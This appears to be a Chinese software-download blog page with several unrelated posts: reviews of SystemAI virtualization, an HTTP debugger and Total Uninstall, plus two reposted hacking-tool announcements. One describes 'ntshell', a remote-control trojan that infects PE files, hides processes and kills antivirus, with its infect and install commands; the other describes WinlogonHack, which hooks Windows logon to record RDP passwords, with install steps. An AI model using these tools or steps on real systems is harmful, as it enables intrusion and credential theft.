软件工作机制：
SystemAI™为你的每个应用程序创建一个理想的虚拟机环境。通过将你的程序隔离在单独的虚拟机中，SystemAI消除了各软件之间的冲突，以及这些冲突造成的系统崩溃。“Collective Intelligence”技术通过分析所有安装有SystemAI的计算机上的程序运行性能，为每一个虚拟机创建定制的优化设置。

SystemAI虚拟计算机：
虚拟机就像一个保护性泡泡，程序在这个泡泡中运行，与其他的程序相隔离，因此能消除程序间的冲突。每一个虚拟电脑都自给自足，有自己的注册表和文件系统，就像是你的每个程序都运行在单独的计算机上。SystemAI然后优化每个虚拟计算机的性能及其应用，这就是Collective Intelligence技术。

Collective Intelligence技术：
SystemAI组建了一个能互相学习的智能计算机网络。Collective Intelligence技术分析所有安装SystemAI的计算机上的程序性能，并利用这些信息来为你的每个程序创建定制的优化。这样就能修复在你安装SystemAI以前碰到的问题，使你的程序满足你不断变化的需求。

点击下载
MD5:1395ec3ee14a5e3ca3e716f3cbdf7fb6

我的观点：
以上是软件的官方介绍，“看上去很美”。但是以我个人的使用经验来看，这个软件不像它宣称的那么有用。我使用了一整天，不管是运行小软件例如Total Commander，还是大型软件如AutoCAD2008或者Visual Studio 2005，程序运行性能都没有什么提高（SystemAI生效的标志是程序窗口右上角有个“Virtual”的标志）。莫非，我的电脑已经是“急速运行”了？总的来说，软件的机制确实非常新颖，如果SystemAI的虚拟机技术能进一步提高“单独优化每个程序”的性能，那么这将是一个非常酷的软件。软件的界面和操作都设计得简单易用，很有大家风范。看得出来，Celceo公司是在很用心的制作这个软件。

至于该软件到底实用还是不实用，各位看官自己试试吧。

Popularity: 67% [?]

软件作者：被诅咒的神
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
这是一个免费开源的远程控制软件，源码仅供学习参考，请勿用于非法用途。
功能特点：
1.提供CMDSHELL、文件管理、进程管理、端口代理（未完成）、屏幕捕获和一些其它功能
2.可感染32位PE文件，感染后可选择在宿主进程空间中运行（无进程）或创建新进程运行，
在宿主进程中运行还可选择端口劫持，即复用宿主所打开的端口，感染不影响宿主正常运行
3.用到了一些内核技术，包括活动进程链脱链（隐藏进程），与ICESWORD相同的进程强杀方
法（能杀掉一些杀毒软件的进程），Ring0打开文件（用于感染正在运行的可执行文件），
2000/xp下采用无驱Ring0
4.同时支持正向连接和反向连接，服务端和控制端均可接受管理多个连接
感染文件方法：ntshell.exe -infect C:\test.exe
ntshell.exe先用生成服务端生成
安装成系统服务：ntshell.exe -install
服务移除：ntshell.exe -remove
代码编译环境：Windows XP SP2 + VC6.0
服务端采用纯C编写，VC直接编译
控制端为C++和WTL，需在VC中加入WTL支持才能编译



如果您发现BUG或是有什么好的建议，请发送mail给我：ktwyz#163.com
注：由于没时间做兼容性测试，一些内核操作可能导致系统蓝屏，测试前请先保存好数据
注2：该版本尚未加入驱动支持，故暂时无法在2003下使用Ring0的全部功能
下载地址： 2007-12-31.rar

Popularity: 81% [?]

文章作者：lovemfc
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

在得到system权限下，通常希望得到3389管理员密码，来进一步得到更多的信息，方便进一步的渗透。
gina木马比较不错，但是貌似win 2000少导出一个函数，用在win 2000下可能崩溃。
于是写了一个小工具，通过挂钩 msgina.dll WlxLoggedOutSAS 函数，记录登录帐户密码！
启动就用winlogon 通知包，当有3389，连上服务器时。新创建的 winlogon.exe 会在登录前加载，注册了 "Startup" 的dll，Hook 了函数，登录成功后，记录密码到 boot.dat 文件，并取消Hook。退出3389后，dll 文件即可删除。
详细代码及工具，见附件。
截图

理论上只要msgina.dll WlxLoggedOutSAS 前五个字节 为
mov edi,edi
push ebp
mov ebp,esp
就可以通过！
测试过 xp , 2003 。没有测试过 2000 。希望哪位朋友测试下，希望能做到服务器通杀！
有bug的Q我，343789385

WinlogonHack
一。执行install.bat 安装。
不用重启, 当有3389登上时，自动加载DLL，并且记录登录密码！ 保存为boot.dat文件.
二。运行ReadLog.bat 移动密码文件到当前目录。查看吧～
三。执行Uninstall.bat，若 %systemroot%\system32\wminotify.dll 文件未能删除，那就重启再删了吧，润物细无声~~~

工具： WinlogonHack.rar (17 K)
代码： source.rar (11 K)

Popularity: 84% [?]

【功能特点】

1. 支持HTTP和HTTPS(SSL加密)网络协议的跟踪和调试。
2. 可以查看到HTTP/HTTPS协议连接的详细过程和返回结果。
3. 支持HTTP的Proxy代理。
4. 自动处理重定向Redirect功能。
5. 自动处理Cookie的接收和发送。
6. 可以自行设置和增加HTTP请求命令的参数。

点击下载 [MD5: B00127ABB08E7BF75D30FB283AFC5ADC]

PS : HTTP协议调试器,支持SSL，Proxy.

Popularity: 76% [?]

Total Uninstall (软件安装卸载监视)能帮你监视软件安装的所有过程，记录下它对系统所做的任何改变，比如：添加的文件、对注册表和系统文件的修改，并制作成安装前和安装后的快照。卸载软件时，不需要使用卸载程序，直接通过该软件便可将其完全地清除出系统，不留下任何痕迹。从而保证了系统的清洁。

主要特点:
*监控安装中注册表及文件系统的改变
*完全彻底卸载被监控程序
*对相应的改变进行统计
*用户可对监控变化视图进行设置
*可在所监控程序之间进行轻松切换
*可对运行中的安装程序进行提示
*可在侦测到的变化中进行搜索
*用户可对扫描项目及卸载项目进行设置
*共享 .dll 文件处理
*导出监控列表、卸载日志等为文本文件
*导出注册表更改
*打印输出
*完全支持 Unicode

官方主页：http://www.martau.com/

点击下载 (MD5: 179A8A7BDD10EA073CEE5D816FAB64DD)

PS:测试不错的玩艺儿

Popularity: 100% [?]